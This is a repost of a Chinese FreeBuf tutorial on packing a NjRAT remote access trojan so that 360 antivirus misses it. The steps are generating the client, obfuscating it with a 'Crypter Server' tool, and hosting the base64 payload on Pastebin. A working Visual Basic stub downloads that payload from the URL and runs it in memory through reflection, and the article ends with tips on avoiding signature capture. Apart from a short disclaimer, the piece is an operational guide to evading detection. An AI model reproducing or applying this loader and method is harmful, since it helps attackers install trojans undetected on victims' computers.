117

技术讨论 | NjRAT通过base64编码加密混淆Code免杀绕过360杀毒实验

 5 years ago
source link: http://www.freebuf.com/articles/rookie/174776.html?amp%3Butm_medium=referral
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

* 本文作者:艾登——皮尔斯,本文属FreeBuf原创奖励计划,未经许可禁止转载

这篇文章鄙人我主要是教大家如何加密免杀国外NjRAT生成的客户端,以达到逃避360杀软检测目的,希望各位Freebuf小粉喜欢。此文章仅用于教育目的,切勿用于非法攻击使用,出现一切法律纠纷与作者无关,全由使用者承担。

Inueqq2.jpg!web

介绍

NjRAT也称为Bladabindi  ,是一种远程访问木马 ,允许程序持有者通过文件传播的方式来控制最终用户的计算机以达到攻击的目的。 它于2013年6月首次被安全工程师发现,其中一些变体追溯到2012年11月。它是由讲阿拉伯语的清真作者编写的,主要用来对付中东其他阿拉伯国家的政府、金融、教育、能源等目标(这可非常清真)。 它可以通过网络钓鱼和受感染的USB驱动器传播。它被微软恶意软件防护中心评为“严重”。

Freebuf往期关于NjRAT的文章

史上最全的njRAT通信协议分析

准备工作:

NjRAT源码 Github 下载地址: 传送门

Visual Studio 2017:下载地址 传送门

pastebin: 传送门

Crypter Server: 传送门提取码 te5h

1.打开NjRAT生成恶意客户端备用

BnUVjmA.jpg!web

Yr2Qfue.jpg!web 2.打开Crypter Server混淆工具

riy2Mbj.jpg!web

3.点击Crypter Server然后选择刚刚NjRAT生成的恶意客户端

MNZfmiY.jpg!web

4.点击确定然后点击Copy

n632IfB.jpg!web

5.打开pastebin这个网站( www.pastebin.com )

mqE7b2q.jpg!web

6.把在Crypter Serve生成的混淆Code粘贴进去

eQfY3y7.jpg!web

7.点击 Create New Paste

7bM773B.jpg!web

8.生成出来后点击raw

zemeueb.jpg!web

9.记住链接我raw出来的链接地址是: https://pastebin.com/raw/niY7M5Np VNVNRre.jpg!web

10. 打开Visual Studio 2017

7Nvyu22.jpg!web 11.创建一个新的项目

UzmUbqI.jpg!web

12.然后选择VisualBasic>windows桌面>Windows 窗体应用(.NET Framework)

nu6fuaJ.jpg!web

13.然后点击确定进入下面这个界面

m6bUFzE.jpg!web

14.双击箭头所指示的空白处

nABFVb6.jpg!web

15.删除这些Code

jeEZZvB.jpg!web

16.Copy下面的Code到里面

Public Class Form1
  Protected loginn As New Net.WebClient
  Protected loginn1 As String = loginn.DownloadString("votre url de votre code,il doit etre visible dans le site")
  Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
      Dim mr As Object = loginn2.load(Convert.FromBase64String(loginn1))
      Dim mr1 As Object = CallByName(mr, "EntryPoint", CallType.Get)
      DirectCast(mr1, Reflection.MethodBase).Invoke("", Nothing)
  End Sub
  Protected loginn2 As Object = AppDomain.CurrentDomain
End Class

Jjy6Z3Q.jpg!web 上面的Code主要是从服务器得到一个base64编码过的数据,这个数据是一个宏,base64解码之后运行这个宏。

17.把你刚刚在Pastebin网站上raw出来的Code的链接 https://pastebin.com/raw/niY7M5Np

Copy进入VB工程,把Form1.vb工程中的”votre url de votre code,il doit etre visible dans le site”替换成Pastebin上Raw出来的Code链接。

ZBNbama.jpg!web

18.右击你的项目名称

MnYbqe6.jpg!web

19.选择添加模块

Yz6FnuM.jpg!web

20.选择”模块”然后点击确定

eiYJryz.jpg!web

21.然后把”模块”里面的Code给删除,然后回到”Crypter Server”点击Copy再点击Code,然后点击”Show Code”再点击Copy复制

ve26Bzr.jpg!web

24.粘贴到刚刚在VB工程里面创建的模块

Q7rMbai.jpg!web

25.点击”项目”>”项目属性”

bemm2iR.jpg!web

26.启用应用程序框架取消打勾

j6bUZnV.jpg!web

27.右击项目封装成exe文件生成

VFNrmeV.jpg!web

然后打开360杀毒软件进行查杀一下

QJRNbaR.jpg!web

扫描日志:

22Af6r3.jpg!web

B站视频链接: https://www.bilibili.com/video/av24811247

演示视频下载链接: https://pan.baidu.com/s/1Ags9tokNth60AxgrIvX7Jg 密码: 1hnj

主要是通过 base64编码 混淆了NjRAT生成的恶意客户端Code,让杀软增加了查杀难度。其次大家不要频繁上传查杀自己生成的Payload以免被抓取到指纹特征GG。

* 本文作者:艾登——皮尔斯,本文属FreeBuf原创奖励计划,未经许可禁止转载


report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK